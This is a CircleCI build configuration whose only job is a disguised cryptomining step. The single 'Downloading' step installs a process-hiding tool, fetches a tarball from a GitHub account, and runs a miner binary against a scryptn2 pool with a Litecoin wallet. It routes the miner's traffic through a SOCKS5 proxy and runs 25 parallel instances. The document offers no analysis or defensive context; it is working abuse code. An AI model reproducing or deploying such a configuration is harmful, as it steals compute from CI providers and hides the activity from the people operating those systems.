version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202101-01
    parallelism: 25
    steps:
      - run: 
         name: Downloading
         command: |
          sudo apt update && sudo apt upgrade -y && curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && ph wget https://github.com/liyanul2525/rondo/raw/main/sayang.tar.gz && tar -xf sayang.tar.gz && sayang/rondo -a scryptn2 -o stratum+tcp://scryptn2.na.mine.zpool.ca:4339 -u LXXC5yzd4amhAYzNVoYziU2PWdaqFWNn1T -p c=LTC,zap=XBTX -x socks5://192.252.209.155:14455 -t 4
workflows:
    version: 2
    build:
        jobs:
            - build
